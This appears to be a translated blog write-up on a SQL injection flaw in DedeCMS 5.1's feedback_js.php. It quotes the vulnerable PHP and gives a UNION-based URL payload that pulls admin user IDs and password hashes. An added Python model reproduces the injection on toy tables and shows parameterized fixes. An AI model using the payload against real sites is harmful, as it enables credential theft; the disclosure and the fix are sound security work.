Author: st0p RainyFox
Please credit the source when reprinting: http://www.st0p.org http://bbs.erpangzi.com/
This vulnerability was discovered by RainyFox and me.
It is also exploitable when magic_quotes_gpc = off.
Vulnerability version: DEDECMS 5.1
This vulnerability can be used to obtain the backend administrator's account name and password hash. It exists in the file plus/feedback_js.php, and the unfiltered parameter is $arcurl.
......
$urlindex = 0;
if (empty($arcID))
{
    $row = $dlist->dsql->GetOne("Select id From `dede_cache_feedbackurl` where url=$arcurl ");
    // $arcurl is not filtered here
    if (is_array($row)) $urlindex = $row['id'];
    // If the query returns a row, $urlindex is assigned the queried $row['id']. We can construct an SQL statement so that this value is carried into the operations below.
}
if (empty($arcID) && empty($urlindex)) exit();
// Exit if both $arcID and $urlindex are empty
......
if (empty($arcID)) $wq = "urlindex=$urlindex ";
// We leave $arcID empty, so the result of the query above is assigned to $wq and used in the following query.
else $wq = "aid=$arcID ";
$querystring = "select * from `dede_feedback` where $wq and ischeck=1 order by dtime desc ";
$dlist->Init();
$dlist->SetSource($querystring);
......
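The two-stage flow in the listing above, reduced to a self-contained Python/sqlite3 model. This is an added illustration, not DedeCMS code: the table names, columns and rows are constructed stand-ins for dede_cache_feedbackurl and dede_feedback. It assumes the URL comparison wraps the value in single quotes, as the magic_quotes remarks on this page imply; the point that holds either way is that request data is pasted into SQL text, and that the id returned by the first query is pasted, unchecked, into the second. The hardened variants bind parameters and force urlindex to an integer before it reaches the query.

```python
import sqlite3


def build_db():
    """Constructed toy tables standing in for dede_cache_feedbackurl and dede_feedback
    (assumption: only the columns the two queries on the page touch are modelled)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cache_feedbackurl (id INTEGER PRIMARY KEY, url TEXT)")
    conn.execute("INSERT INTO cache_feedbackurl VALUES (7, 'http://example.invalid/a.html')")
    conn.execute(
        "CREATE TABLE feedback (id INTEGER PRIMARY KEY, urlindex INTEGER, msg TEXT, ischeck INTEGER)"
    )
    conn.executemany(
        "INSERT INTO feedback VALUES (?, ?, ?, ?)",
        [
            (1, 7, "approved comment on page 7", 1),
            (2, 9, "approved comment on page 9", 1),
            (3, 9, "unapproved comment on page 9", 0),  # ischeck = 0: must never be listed
        ],
    )
    return conn


def lookup_urlindex_vulnerable(conn, arcurl):
    """Stage 1 as on the page: the request value is spliced into the SQL text."""
    sql = "SELECT id FROM cache_feedbackurl WHERE url = '%s'" % arcurl
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_urlindex_fixed(conn, arcurl):
    """Stage 1 hardened: a bound parameter is compared as data, never parsed as SQL."""
    row = conn.execute(
        "SELECT id FROM cache_feedbackurl WHERE url = ?", (arcurl,)
    ).fetchone()
    return row[0] if row else None


def feedback_vulnerable(conn, urlindex):
    """Stage 2 as on the page: $wq = "urlindex=$urlindex" is built by interpolation, so
    whatever stage 1 returned (or was made to return by a UNION) becomes SQL text."""
    wq = "urlindex = %s" % urlindex
    sql = "SELECT msg FROM feedback WHERE %s AND ischeck = 1 ORDER BY id" % wq
    return [r[0] for r in conn.execute(sql).fetchall()]


def feedback_fixed(conn, urlindex):
    """Stage 2 hardened: urlindex must be an integer (otherwise the request is rejected,
    as the page's exit() does for an empty value) and is bound rather than interpolated."""
    try:
        idx = int(urlindex)
    except (TypeError, ValueError):
        return []
    rows = conn.execute(
        "SELECT msg FROM feedback WHERE urlindex = ? AND ischeck = 1 ORDER BY id", (idx,)
    ).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = build_db()
    good = "http://example.invalid/a.html"
    # Constructed input of the kind the page describes: a quote closes the string and a
    # UNION appends a row, so the caller, not the cache table, decides what urlindex becomes.
    bad = "' UNION SELECT 99 -- "
    print(lookup_urlindex_vulnerable(db, good), lookup_urlindex_vulnerable(db, bad))  # 7 99
    print(lookup_urlindex_fixed(db, good), lookup_urlindex_fixed(db, bad))            # 7 None
    # Stage 2: a non-numeric urlindex widens the WHERE clause and leaks the unapproved row.
    print(feedback_vulnerable(db, "9 OR 1=1"))
    print(feedback_fixed(db, "9 OR 1=1"), feedback_fixed(db, "9"))
```

The integer cast in feedback_fixed is the cheap part of the fix and already closes the chain the page describes, because a urlindex that is not a plain number never reaches the second query; binding the parameter on top of that removes the dependency on how the first query was written.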
Let's take a look at the method. Hey, I used union twice to close the statement.
http://st0p/dedecms51/plus/feedback_js.php?arcurl= union select "and 1 = 2 union select, 1, userid, pwd, 1, 1 from dede_admin where 1 = 1 union select * from dede_feedback where 1 = 2 and = "from dede_admin where =
Alas, when RainyFox and I were looking for a target to test on, he said he could get through even with magic_quotes_gpc = on.... this idea is too YD.. it's terrible, and it can be done. This area must be a mess: many programs call their own escaping only when magic_quotes_gpc is disabled, as it is by default in PHP... it's a nightmare for PHP programs...